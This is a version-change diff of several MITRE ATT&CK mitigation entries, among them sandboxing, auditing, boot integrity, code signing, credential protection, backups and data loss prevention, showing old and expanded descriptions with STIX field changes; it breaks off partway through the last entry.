Version changed from: 1.1 → 1.2
|
|
|---|
| t | Restrict execution of code to a virtual environment on or in | t | Application Isolation and Sandboxing refers to the technique |
| transit to an endpoint system. | | of restricting the execution of code to a controlled and is |
| | | olated environment (e.g., a virtual environment, container, |
| | | or sandbox). This method prevents potentially malicious code |
| | | from affecting the rest of the system or network by limitin |
| | | g access to sensitive resources and critical operations. The |
| | | goal is to contain threats and minimize their impact. This |
| | | mitigation can be implemented through the following measures |
| | | : Browser Sandboxing: - Use Case: Implement browser sandbo |
| | | xing to isolate untrusted web content, preventing malicious |
| | | web pages or scripts from accessing sensitive system files. |
| | | - Implementation: Use tools like Google Chrome's built-in sa |
| | | ndbox or deploy solutions like Bromium to secure user web in |
| | | teractions. Application Virtualization: - Use Case: Deploy |
| | | critical or high-risk applications in a virtualized environ |
| | | ment to ensure any compromise does not affect the host syste |
| | | m. - Implementation: Use application virtualization platform |
| | | s to run applications in isolated environments. Email Attac |
| | | hment Sandboxing: - Use Case: Route email attachments to a |
| | | sandbox environment to detect and block malware before deliv |
| | | ering emails to end-users. - Implementation: Integrate secur |
| | | ity solutions with sandbox capabilities to analyze email att |
| | | achments. Endpoint Sandboxing: - Use Case: Run all downloa |
| | | ded files and applications in a restricted environment to mo |
| | | nitor their behavior for malicious activity. - Implementatio |
| | | n: Use endpoint protection tools for sandboxing at the endpo |
| | | int level. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-31 13:08:03.851000+00:00 | 2024-12-10 16:09:19.285000+00:00 |
| description | Restrict execution of code to a virtual environment on or in transit to an endpoint system. | Application Isolation and Sandboxing refers to the technique of restricting the execution of code to a controlled and isolated environment (e.g., a virtual environment, container, or sandbox). This method prevents potentially malicious code from affecting the rest of the system or network by limiting access to sensitive resources and critical operations. The goal is to contain threats and minimize their impact. This mitigation can be implemented through the following measures:
Browser Sandboxing:
- Use Case: Implement browser sandboxing to isolate untrusted web content, preventing malicious web pages or scripts from accessing sensitive system files.
- Implementation: Use tools like Google Chrome's built-in sandbox or deploy solutions like Bromium to secure user web interactions.
Application Virtualization:
- Use Case: Deploy critical or high-risk applications in a virtualized environment to ensure any compromise does not affect the host system.
- Implementation: Use application virtualization platforms to run applications in isolated environments.
Email Attachment Sandboxing:
- Use Case: Route email attachments to a sandbox environment to detect and block malware before delivering emails to end-users.
- Implementation: Integrate security solutions with sandbox capabilities to analyze email attachments.
Endpoint Sandboxing:
- Use Case: Run all downloaded files and applications in a restricted environment to monitor their behavior for malicious activity.
- Implementation: Use endpoint protection tools for sandboxing at the endpoint level. |
| x_mitre_version | 1.1 | 1.2 |
[M1047] Audit
Current version: 1.3
Version changed from: 1.2 → 1.3
|
|
|---|
| t | Perform audits or scans of systems, permissions, insecure so | t | Auditing is the process of recording activity and systematic |
| ftware, insecure configurations, etc. to identify potential | | ally reviewing and analyzing the activity and system configu |
| weaknesses. | | rations. The primary purpose of auditing is to detect anomal |
| | | ies and identify potential threats or weaknesses in the envi |
| | | ronment. Proper auditing configurations can also help to mee |
| | | t compliance requirements. The process of auditing encompass |
| | | es regular analysis of user behaviors and system logs in sup |
| | | port of proactive security measures. Auditing is applicable |
| | | to all systems used within an organization, from the front |
| | | door of a building to accessing a file on a fileserver. It i |
| | | s considered more critical for regulated industries such as, |
| | | healthcare, finance and government where compliance require |
| | | ments demand stringent tracking of user and system activates |
| | | .This mitigation can be implemented through the following me |
| | | asures: System Audit: - Use Case: Regularly assess system |
| | | configurations to ensure compliance with organizational sec |
| | | urity policies. - Implementation: Use tools to scan for devi |
| | | ations from established benchmarks. Permission Audits: - U |
| | | se Case: Review file and folder permissions to minimize the |
| | | risk of unauthorized access or privilege escalation. - Imple |
| | | mentation: Run access reviews to identify users or groups wi |
| | | th excessive permissions. Software Audits: - Use Case: Ide |
| | | ntify outdated, unsupported, or insecure software that could |
| | | serve as an attack vector. - Implementation: Use inventory |
| | | and vulnerability scanning tools to detect outdated versions |
| | | and recommend secure alternatives. Configuration Audits: |
| | | - Use Case: Evaluate system and network configurations to en |
| | | sure secure settings (e.g., disabled SMBv1, enabled MFA). - |
| | | Implementation: Implement automated configuration scanning t |
| | | ools like SCAP (Security Content Automation Protocol) to ide |
| | | ntify non-compliant systems. Network Audits: - Use Case: E |
| | | xamine network traffic, firewall rules, and endpoint communi |
| | | cations to identify unauthorized or insecure connections. - |
| | | Implementation: Utilize tools such as Wireshark, or Zeek to |
| | | monitor and log suspicious network behavior. |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 18:53:08.707000+00:00 | 2024-12-10 16:28:27.046000+00:00 |
| description | Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses. | Auditing is the process of recording activity and systematically reviewing and analyzing the activity and system configurations. The primary purpose of auditing is to detect anomalies and identify potential threats or weaknesses in the environment. Proper auditing configurations can also help to meet compliance requirements. The process of auditing encompasses regular analysis of user behaviors and system logs in support of proactive security measures.
Auditing is applicable to all systems used within an organization, from the front door of a building to accessing a file on a fileserver. It is considered more critical for regulated industries such as, healthcare, finance and government where compliance requirements demand stringent tracking of user and system activates.This mitigation can be implemented through the following measures:
System Audit:
- Use Case: Regularly assess system configurations to ensure compliance with organizational security policies.
- Implementation: Use tools to scan for deviations from established benchmarks.
Permission Audits:
- Use Case: Review file and folder permissions to minimize the risk of unauthorized access or privilege escalation.
- Implementation: Run access reviews to identify users or groups with excessive permissions.
Software Audits:
- Use Case: Identify outdated, unsupported, or insecure software that could serve as an attack vector.
- Implementation: Use inventory and vulnerability scanning tools to detect outdated versions and recommend secure alternatives.
Configuration Audits:
- Use Case: Evaluate system and network configurations to ensure secure settings (e.g., disabled SMBv1, enabled MFA).
- Implementation: Implement automated configuration scanning tools like SCAP (Security Content Automation Protocol) to identify non-compliant systems.
Network Audits:
- Use Case: Examine network traffic, firewall rules, and endpoint communications to identify unauthorized or insecure connections.
- Implementation: Utilize tools such as Wireshark, or Zeek to monitor and log suspicious network behavior. |
| x_mitre_version | 1.2 | 1.3 |
[M1040] Behavior Prevention on Endpoint
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Use capabilities to prevent suspicious behavior patterns fro | t | Behavior Prevention on Endpoint refers to the use of technol |
| m occurring on endpoint systems. This could include suspicio | | ogies and strategies to detect and block potentially malicio |
| us process, file, API call, etc. behavior. | | us activities by analyzing the behavior of processes, files, |
| | | API calls, and other endpoint events. Rather than relying s |
| | | olely on known signatures, this approach leverages heuristic |
| | | s, machine learning, and real-time monitoring to identify an |
| | | omalous patterns indicative of an attack. This mitigation ca |
| | | n be implemented through the following measures: Suspicious |
| | | Process Behavior: - Implementation: Use Endpoint Detection |
| | | and Response (EDR) tools to monitor and block processes exh |
| | | ibiting unusual behavior, such as privilege escalation attem |
| | | pts. - Use Case: An attacker uses a known vulnerability to s |
| | | pawn a privileged process from a user-level application. The |
| | | endpoint tool detects the abnormal parent-child process rel |
| | | ationship and blocks the action. Unauthorized File Access: |
| | | - Implementation: Leverage Data Loss Prevention (DLP) or en |
| | | dpoint tools to block processes attempting to access sensiti |
| | | ve files without proper authorization. - Use Case: A process |
| | | tries to read or modify a sensitive file located in a restr |
| | | icted directory, such as /etc/shadow on Linux or the SAM reg |
| | | istry hive on Windows. The endpoint tool identifies this ano |
| | | malous behavior and prevents it. Abnormal API Calls: - Imp |
| | | lementation: Implement runtime analysis tools to monitor API |
| | | calls and block those associated with malicious activities. |
| | | - Use Case: A process dynamically injects itself into anoth |
| | | er process to hijack its execution. The endpoint detects the |
| | | abnormal use of APIs like `OpenProcess` and `WriteProcessMe |
| | | mory` and terminates the offending process. Exploit Prevent |
| | | ion: - Implementation: Use behavioral exploit prevention to |
| | | ols to detect and block exploits attempting to gain unauthor |
| | | ized access. - Use Case: A buffer overflow exploit is launch |
| | | ed against a vulnerable application. The endpoint detects th |
| | | e anomalous memory write operation and halts the process. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2019-06-11 16:43:05.712000+00:00 | 2024-12-10 16:29:44.429000+00:00 |
| description | Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior. | Behavior Prevention on Endpoint refers to the use of technologies and strategies to detect and block potentially malicious activities by analyzing the behavior of processes, files, API calls, and other endpoint events. Rather than relying solely on known signatures, this approach leverages heuristics, machine learning, and real-time monitoring to identify anomalous patterns indicative of an attack. This mitigation can be implemented through the following measures:
Suspicious Process Behavior:
- Implementation: Use Endpoint Detection and Response (EDR) tools to monitor and block processes exhibiting unusual behavior, such as privilege escalation attempts.
- Use Case: An attacker uses a known vulnerability to spawn a privileged process from a user-level application. The endpoint tool detects the abnormal parent-child process relationship and blocks the action.
Unauthorized File Access:
- Implementation: Leverage Data Loss Prevention (DLP) or endpoint tools to block processes attempting to access sensitive files without proper authorization.
- Use Case: A process tries to read or modify a sensitive file located in a restricted directory, such as /etc/shadow on Linux or the SAM registry hive on Windows. The endpoint tool identifies this anomalous behavior and prevents it.
Abnormal API Calls:
- Implementation: Implement runtime analysis tools to monitor API calls and block those associated with malicious activities.
- Use Case: A process dynamically injects itself into another process to hijack its execution. The endpoint detects the abnormal use of APIs like `OpenProcess` and `WriteProcessMemory` and terminates the offending process.
Exploit Prevention:
- Implementation: Use behavioral exploit prevention tools to detect and block exploits attempting to gain unauthorized access.
- Use Case: A buffer overflow exploit is launched against a vulnerable application. The endpoint detects the anomalous memory write operation and halts the process. |
| x_mitre_version | 1.0 | 1.1 |
[M1046] Boot Integrity
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Use secure methods to boot a system and verify the integrity | t | Boot Integrity ensures that a system starts securely by veri |
| of the operating system and loading mechanisms. | | fying the integrity of its boot process, operating system, a |
| | | nd associated components. This mitigation focuses on leverag |
| | | ing secure boot mechanisms, hardware-rooted trust, and runti |
| | | me integrity checks to prevent tampering during the boot seq |
| | | uence. It is designed to thwart adversaries attempting to mo |
| | | dify system firmware, bootloaders, or critical OS components |
| | | . This mitigation can be implemented through the following m |
| | | easures: Implementation of Secure Boot: - Implementation: |
| | | Enable UEFI Secure Boot on all systems and configure it to a |
| | | llow only signed bootloaders and operating systems. - Use Ca |
| | | se: An adversary attempts to replace the system’s bootloader |
| | | with a malicious version to gain persistence. Secure Boot p |
| | | revents the untrusted bootloader from executing, halting the |
| | | attack. Utilization of TPMs: - Implementation: Configure |
| | | systems to use TPM-based attestation for boot integrity, ens |
| | | uring that any modification to the firmware, bootloader, or |
| | | OS is detected. - Use Case: A compromised firmware component |
| | | alters the boot sequence. The TPM detects the change and tr |
| | | iggers an alert, allowing the organization to respond before |
| | | further damage. Enable Bootloader Passwords: - Implementa |
| | | tion: Protect BIOS/UEFI settings with a strong password and |
| | | limit physical access to devices. - Use Case: An attacker wi |
| | | th physical access attempts to disable Secure Boot or modify |
| | | the boot sequence. The password prevents unauthorized chang |
| | | es. Runtime Integrity Monitoring: - Implementation: Deploy |
| | | solutions to verify the integrity of critical files and pro |
| | | cesses after boot. - Use Case: A malware infection modifies |
| | | kernel modules post-boot. Runtime integrity monitoring detec |
| | | ts the modification and prevents the malicious module from l |
| | | oading. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-19 12:28:50.603000+00:00 | 2024-12-10 18:48:36.517000+00:00 |
| description | Use secure methods to boot a system and verify the integrity of the operating system and loading mechanisms. | Boot Integrity ensures that a system starts securely by verifying the integrity of its boot process, operating system, and associated components. This mitigation focuses on leveraging secure boot mechanisms, hardware-rooted trust, and runtime integrity checks to prevent tampering during the boot sequence. It is designed to thwart adversaries attempting to modify system firmware, bootloaders, or critical OS components. This mitigation can be implemented through the following measures:
Implementation of Secure Boot:
- Implementation: Enable UEFI Secure Boot on all systems and configure it to allow only signed bootloaders and operating systems.
- Use Case: An adversary attempts to replace the system’s bootloader with a malicious version to gain persistence. Secure Boot prevents the untrusted bootloader from executing, halting the attack.
Utilization of TPMs:
- Implementation: Configure systems to use TPM-based attestation for boot integrity, ensuring that any modification to the firmware, bootloader, or OS is detected.
- Use Case: A compromised firmware component alters the boot sequence. The TPM detects the change and triggers an alert, allowing the organization to respond before further damage.
Enable Bootloader Passwords:
- Implementation: Protect BIOS/UEFI settings with a strong password and limit physical access to devices.
- Use Case: An attacker with physical access attempts to disable Secure Boot or modify the boot sequence. The password prevents unauthorized changes.
Runtime Integrity Monitoring:
- Implementation: Deploy solutions to verify the integrity of critical files and processes after boot.
- Use Case: A malware infection modifies kernel modules post-boot. Runtime integrity monitoring detects the modification and prevents the malicious module from loading. |
| x_mitre_version | 1.0 | 1.1 |
[M1045] Code Signing
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Enforce binary and application integrity with digital signat | t | Code Signing is a security process that ensures the authenti |
| ure verification to prevent untrusted code from executing. | | city and integrity of software by digitally signing executab |
| | | les, scripts, and other code artifacts. It prevents untruste |
| | | d or malicious code from executing by verifying the digital |
| | | signatures against trusted sources. Code signing protects ag |
| | | ainst tampering, impersonation, and distribution of unauthor |
| | | ized or malicious software, forming a critical defense again |
| | | st supply chain and software exploitation attacks. This miti |
| | | gation can be implemented through the following measures: E |
| | | nforce Signed Code Execution: - Implementation: Configure o |
| | | perating systems (e.g., Windows with AppLocker or Linux with |
| | | Secure Boot) to allow only signed code to execute. - Use Ca |
| | | se: Prevent the execution of malicious PowerShell scripts by |
| | | requiring all scripts to be signed with a trusted certifica |
| | | te. Vendor-Signed Driver Enforcement: - Implementation: En |
| | | able kernel-mode code signing to ensure that only drivers si |
| | | gned by trusted vendors can be loaded. - Use Case: A malicio |
| | | us driver attempting to modify system memory fails to load b |
| | | ecause it lacks a valid signature. Certificate Revocation M |
| | | anagement: - Implementation: Use Online Certificate Status |
| | | Protocol (OCSP) or Certificate Revocation Lists (CRLs) to bl |
| | | ock certificates associated with compromised or deprecated c |
| | | ode. - Use Case: A compromised certificate used to sign a ma |
| | | licious update is revoked, preventing further execution of t |
| | | he software. Third-Party Software Verification: - Implemen |
| | | tation: Require software from external vendors to be signed |
| | | with valid certificates before deployment. - Use Case: An or |
| | | ganization only deploys signed and verified third-party soft |
| | | ware to prevent supply chain attacks. Script Integrity in C |
| | | I/CD Pipelines: - Implementation: Integrate code signing in |
| | | to CI/CD pipelines to sign and verify code artifacts before |
| | | production release. - Use Case: A software company ensures t |
| | | hat all production builds are signed, preventing tampered bu |
| | | ilds from reaching customers. **Key Components of Code Sign |
| | | ing** - Digital Signature Verification: Verifies the authen |
| | | ticity of code by ensuring it was signed by a trusted entity |
| | | . - Certificate Management: Uses Public Key Infrastructure ( |
| | | PKI) to manage signing certificates and revocation lists. - |
| | | Enforced Policy for Unsigned Code: Prevents the execution of |
| | | unsigned or untrusted binaries and scripts. - Hash Integrit |
| | | y Check: Confirms that code has not been altered since signi |
| | | ng by comparing cryptographic hashes. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-05-20 13:12:02.881000+00:00 | 2024-12-10 18:52:40.747000+00:00 |
| description | Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing. | Code Signing is a security process that ensures the authenticity and integrity of software by digitally signing executables, scripts, and other code artifacts. It prevents untrusted or malicious code from executing by verifying the digital signatures against trusted sources. Code signing protects against tampering, impersonation, and distribution of unauthorized or malicious software, forming a critical defense against supply chain and software exploitation attacks. This mitigation can be implemented through the following measures:
Enforce Signed Code Execution:
- Implementation: Configure operating systems (e.g., Windows with AppLocker or Linux with Secure Boot) to allow only signed code to execute.
- Use Case: Prevent the execution of malicious PowerShell scripts by requiring all scripts to be signed with a trusted certificate.
Vendor-Signed Driver Enforcement:
- Implementation: Enable kernel-mode code signing to ensure that only drivers signed by trusted vendors can be loaded.
- Use Case: A malicious driver attempting to modify system memory fails to load because it lacks a valid signature.
Certificate Revocation Management:
- Implementation: Use Online Certificate Status Protocol (OCSP) or Certificate Revocation Lists (CRLs) to block certificates associated with compromised or deprecated code.
- Use Case: A compromised certificate used to sign a malicious update is revoked, preventing further execution of the software.
Third-Party Software Verification:
- Implementation: Require software from external vendors to be signed with valid certificates before deployment.
- Use Case: An organization only deploys signed and verified third-party software to prevent supply chain attacks.
Script Integrity in CI/CD Pipelines:
- Implementation: Integrate code signing into CI/CD pipelines to sign and verify code artifacts before production release.
- Use Case: A software company ensures that all production builds are signed, preventing tampered builds from reaching customers.
**Key Components of Code Signing**
- Digital Signature Verification: Verifies the authenticity of code by ensuring it was signed by a trusted entity.
- Certificate Management: Uses Public Key Infrastructure (PKI) to manage signing certificates and revocation lists.
- Enforced Policy for Unsigned Code: Prevents the execution of unsigned or untrusted binaries and scripts.
- Hash Integrity Check: Confirms that code has not been altered since signing by comparing cryptographic hashes.
|
| x_mitre_version | 1.1 | 1.2 |
[M1043] Credential Access Protection
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Use capabilities to prevent successful credential access by | t | Credential Access Protection focuses on implementing measure |
| adversaries; including blocking forms of credential dumping. | | s to prevent adversaries from obtaining credentials, such as |
| | | passwords, hashes, tokens, or keys, that could be used for |
| | | unauthorized access. This involves restricting access to cre |
| | | dential storage mechanisms, hardening configurations to bloc |
| | | k credential dumping methods, and using monitoring tools to |
| | | detect suspicious credential-related activity. This mitigati |
| | | on can be implemented through the following measures: Restr |
| | | ict Access to Credential Storage: - Use Case: Prevent adver |
| | | saries from accessing the SAM (Security Account Manager) dat |
| | | abase on Windows systems. - Implementation: Enforce least pr |
| | | ivilege principles and restrict administrative access to cre |
| | | dential stores such as `C:\Windows\System32\config\SAM`. Us |
| | | e Credential Guard: - Use Case: Isolate LSASS (Local Securi |
| | | ty Authority Subsystem Service) memory to prevent credential |
| | | dumping. - Implementation: Enable Windows Defender Credenti |
| | | al Guard on enterprise endpoints to isolate secrets and prot |
| | | ect them from unauthorized access. Monitor for Credential D |
| | | umping Tools: - Use Case: Detect and block known tools like |
| | | Mimikatz or Windows Credential Editor. - Implementation: Fl |
| | | ag suspicious process behavior related to credential dumping |
| | | . Disable Cached Credentials: - Use Case: Prevent adversar |
| | | ies from exploiting cached credentials on endpoints. - Imple |
| | | mentation: Configure group policy to reduce or eliminate the |
| | | use of cached credentials (e.g., set Interactive logon: Num |
| | | ber of previous logons to cache to 0). Enable Secure Boot a |
| | | nd Memory Protections: - Use Case: Prevent memory-based att |
| | | acks used to extract credentials. - Implementation: Configur |
| | | e Secure Boot and enforce hardware-based security features l |
| | | ike DEP (Data Execution Prevention) and ASLR (Address Space |
| | | Layout Randomization). |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-10-17 18:53:26.963000+00:00 | 2024-12-10 18:55:27.646000+00:00 |
| description | Use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping. | Credential Access Protection focuses on implementing measures to prevent adversaries from obtaining credentials, such as passwords, hashes, tokens, or keys, that could be used for unauthorized access. This involves restricting access to credential storage mechanisms, hardening configurations to block credential dumping methods, and using monitoring tools to detect suspicious credential-related activity. This mitigation can be implemented through the following measures:
Restrict Access to Credential Storage:
- Use Case: Prevent adversaries from accessing the SAM (Security Account Manager) database on Windows systems.
- Implementation: Enforce least privilege principles and restrict administrative access to credential stores such as `C:\Windows\System32\config\SAM`.
Use Credential Guard:
- Use Case: Isolate LSASS (Local Security Authority Subsystem Service) memory to prevent credential dumping.
- Implementation: Enable Windows Defender Credential Guard on enterprise endpoints to isolate secrets and protect them from unauthorized access.
Monitor for Credential Dumping Tools:
- Use Case: Detect and block known tools like Mimikatz or Windows Credential Editor.
- Implementation: Flag suspicious process behavior related to credential dumping.
Disable Cached Credentials:
- Use Case: Prevent adversaries from exploiting cached credentials on endpoints.
- Implementation: Configure group policy to reduce or eliminate the use of cached credentials (e.g., set Interactive logon: Number of previous logons to cache to 0).
Enable Secure Boot and Memory Protections:
- Use Case: Prevent memory-based attacks used to extract credentials.
- Implementation: Configure Secure Boot and enforce hardware-based security features like DEP (Data Execution Prevention) and ASLR (Address Space Layout Randomization). |
| x_mitre_version | 1.1 | 1.2 |
[M1053] Data Backup
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Take and store data backups from end user systems and critic | t | Data Backup involves taking and securely storing backups of |
| al servers. Ensure backup and storage systems are hardened a | | data from end-user systems and critical servers. It ensures |
| nd kept separate from the corporate network to prevent compr | | that data remains available in the event of system compromis |
| omise. | | e, ransomware attacks, or other disruptions. Backup processe |
| | | s should include hardening backup systems, implementing secu |
| | | re storage solutions, and keeping backups isolated from the |
| | | corporate network to prevent compromise during active incide |
| | | nts. This mitigation can be implemented through the followin |
| | | g measures: Regular Backup Scheduling: - Use Case: Ensure t |
| | | imely and consistent backups of critical data. - Implementat |
| | | ion: Schedule daily incremental backups and weekly full back |
| | | ups for all critical servers and systems. Immutable Backups |
| | | : - Use Case: Protect backups from modification or deletion, |
| | | even by attackers. - Implementation: Use write-once-read-ma |
| | | ny (WORM) storage for backups, preventing ransomware from en |
| | | crypting or deleting backup files. Backup Encryption: - Use |
| | | Case: Protect data integrity and confidentiality during tra |
| | | nsit and storage. - Implementation: Encrypt backups using st |
| | | rong encryption protocols (e.g., AES-256) before storing the |
| | | m in local, cloud, or remote locations. Offsite Backup Stor |
| | | age: - Use Case: Ensure data availability during physical di |
| | | sasters or onsite breaches. - Implementation: Use cloud-base |
| | | d solutions like AWS S3, Azure Backup, or physical offsite s |
| | | torage to maintain a copy of critical data. Backup Testing: |
| | | - Use Case: Validate backup integrity and ensure recoverabi |
| | | lity. - Implementation: Regularly test data restoration proc |
| | | esses to ensure that backups are not corrupted and can be re |
| | | covered quickly. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-31 13:11:28.201000+00:00 | 2024-12-10 15:32:14.846000+00:00 |
| description | Take and store data backups from end user systems and critical servers. Ensure backup and storage systems are hardened and kept separate from the corporate network to prevent compromise. | Data Backup involves taking and securely storing backups of data from end-user systems and critical servers. It ensures that data remains available in the event of system compromise, ransomware attacks, or other disruptions. Backup processes should include hardening backup systems, implementing secure storage solutions, and keeping backups isolated from the corporate network to prevent compromise during active incidents. This mitigation can be implemented through the following measures:
Regular Backup Scheduling:
- Use Case: Ensure timely and consistent backups of critical data.
- Implementation: Schedule daily incremental backups and weekly full backups for all critical servers and systems.
Immutable Backups:
- Use Case: Protect backups from modification or deletion, even by attackers.
- Implementation: Use write-once-read-many (WORM) storage for backups, preventing ransomware from encrypting or deleting backup files.
Backup Encryption:
- Use Case: Protect data integrity and confidentiality during transit and storage.
- Implementation: Encrypt backups using strong encryption protocols (e.g., AES-256) before storing them in local, cloud, or remote locations.
Offsite Backup Storage:
- Use Case: Ensure data availability during physical disasters or onsite breaches.
- Implementation: Use cloud-based solutions like AWS S3, Azure Backup, or physical offsite storage to maintain a copy of critical data.
Backup Testing:
- Use Case: Validate backup integrity and ensure recoverability.
- Implementation: Regularly test data restoration processes to ensure that backups are not corrupted and can be recovered quickly. |
| x_mitre_version | 1.1 | 1.2 |
[M1057] Data Loss Prevention
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
|---|
| t | Use a data loss prevention (DLP) strategy to categorize sens | t | Data Loss Prevention (DLP) involves implementing strategies |
| itive data, identify data formats indicative of personal ide | | and technologies to identify, categorize, monitor, and contr |
| ntifiable information (PII), and restrict exfiltration of se | | ol the movement of sensitive data within an organization. Th |
| nsitive data.(Citation: PurpleSec Data Loss Prevention) | | is includes protecting data formats indicative of Personally |
| | | Identifiable Information (PII), intellectual property, or f |
| | | inancial data from unauthorized access, transmission, or exf |
| | | iltration. DLP solutions integrate with network, endpoint, a |
| | | nd cloud platforms to enforce security policies and prevent |
| | | accidental or malicious data leaks. (Citation: PurpleSec Dat |
| | | a Loss Prevention) This mitigation can be implemented throug |
| | | h the following measures: Sensitive Data Categorization: - |
| | | Use Case: Identify and classify data based on sensitivity ( |
| | | e.g., PII, financial data, trade secrets). - Implementation: |
| | | Use DLP solutions to scan and tag files containing sensitiv |
| | | e information using predefined patterns, such as Social Secu |
| | | rity Numbers or credit card details. Exfiltration Restricti |
| | | ons: - Use Case: Prevent unauthorized transmission of sensi |
| | | tive data. - Implementation: Enforce policies to block unapp |
| | | roved email attachments, unauthorized USB usage, or unencryp |
| | | ted data uploads to cloud storage. Data-in-Transit Monitori |
| | | ng: - Use Case: Detect and prevent the transmission of sens |
| | | itive data over unapproved channels. - Implementation: Deplo |
| | | y network-based DLP tools to inspect outbound traffic for se |
| | | nsitive content (e.g., financial records or PII) and block u |
| | | napproved transmissions. Endpoint Data Protection: - Use C |
| | | ase: Monitor and control sensitive data usage on endpoints. |
| | | - Implementation: Use endpoint-based DLP agents to block cop |
| | | y-paste actions of sensitive data and unauthorized printing |
| | | or file sharing. Cloud Data Security: - Use Case: Protect |
| | | data stored in cloud platforms. - Implementation: Integrate |
| | | DLP with cloud storage platforms like Google Drive, OneDrive |
| | | , or AWS to monitor and restrict sensitive data sharing or d |
| | | ownloads. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-30 15:00:10.680000+00:00 | 2024-12-10 19:10:54.180000+00:00 |
| description | Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention) | Data Loss Prevention (DLP) involves implementing strategies and technologies to identify, categorize, monitor, and control the movement of sensitive data within an organization. This includes protecting data formats indicative of Personally Identifiable Information (PII), intellectual property, or financial data from unauthorized access, transmission, or exfiltration. DLP solutions integrate with network, endpoint, and cloud platforms to enforce security policies and prevent accidental or malicious data leaks. (Citation: PurpleSec Data Loss Prevention) This mitigation can be implemented through the following measures:
Sensitive Data Categorization:
- Use Case: Identify and classify data based on sensitivity (e.g., PII, financial data, trade secrets).
- Implementation: Use DLP solutions to scan and tag files containing sensitive information using predefined patterns, such as Social Security Numbers or credit card details.
Exfiltration Restrictions:
- Use Case: Prevent unauthorized transmission of sensitive data.
- Implementation: Enforce policies to block unapproved email attachments, unauthorized USB usage, or unencrypted data uploads to cloud storage.
Data-in-Transit Monitoring:
- Use Case: Detect and prevent the transmission of sensitive data over unapproved channels.
- Implementation: Deploy network-based DLP tools to inspect outbound traffic for sensitive content (e.g., financial records or PII) and block unapproved transmissions.
Endpoint Data Protection:
- Use Case: Monitor and control sensitive data usage on endpoints.
- Implementation: Use endpoint-based DLP agents to block copy-paste actions of sensitive data and unauthorized printing or file sharing.
Cloud Data Security:
- Use Case: Protect data stored in cloud platforms.
- Implementation: Integrate DLP with cloud storage platforms like Google Drive, OneDrive, or AWS to monitor and restrict sensitive data sharing or downloads. |
| x_mitre_version | 1.0 | 1.1 |
[M1042] Disable or Remove Feature or Program
Current version: 1.2
Version changed from: 1.1 → 1.2
|
|
|---|
| t | Remove or deny access to unnecessary and potentially vulnera | t | Disable or remove unnecessary and potentially vulnerable sof |
| ble software to prevent abuse by adversaries. | | tware, features, or services to reduce the attack surface an |
| | | d prevent abuse by adversaries. This involves identifying so |
| | | ftware or features that are no longer needed or that could b |
| | | e exploited and ensuring they are either removed or properly |
| | | disabled. This mitigation can be implemented through the fo |
| | | llowing measures: Remove Legacy Software: - Use Case: Dis |
| | | able or remove older versions of software that no longer rec |
| | | eive updates or security patches (e.g., legacy Java, Adobe F |
| | | lash). - Implementation: A company removes Flash Player from |
| | | all employee systems after it has reached its end-of-life d |
| | | ate. Disable Unused Features: - Use Case: Turn off unneces |
| | | sary operating system features like SMBv1, Telnet, or RDP if |
| | | they are not required. - Implementation: Disable SMBv1 in a |
| | | Windows environment to mitigate vulnerabilities like Eterna |
| | | lBlue. Control Applications Installed by Users: - Use Case |
| | | : Prevent users from installing unauthorized software via gr |
| | | oup policies or other management tools. - Implementation: Bl |
| | | ock user installations of unauthorized file-sharing applicat |
| | | ions (e.g., BitTorrent clients) in an enterprise environment |
| | | . Remove Unnecessary Services: - Use Case: Identify and di |
| | | sable unnecessary default services running on endpoints, ser |
| | | vers, or network devices. - Implementation: Disable unused a |
| | | dministrative shares (e.g., C$, ADMIN$) on workstations. Re |
| | | strict Add-ons and Plugins: - Use Case: Remove or disable b |
| | | rowser plugins and add-ons that are not needed for business |
| | | purposes. - Implementation: Disable Java and ActiveX plugins |
| | | in web browsers to prevent drive-by attacks. |
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_attack_spec_version | | 3.2.0 |
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-31 13:12:04.776000+00:00 | 2024-12-10 19:21:06.027000+00:00 |
| description | Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries. | Disable or remove unnecessary and potentially vulnerable software, features, or services to reduce the attack surface and prevent abuse by adversaries. This involves identifying software or features that are no longer needed or that could be exploited and ensuring they are either removed or properly disabled. This mitigation can be implemented through the following measures:
Remove Legacy Software:
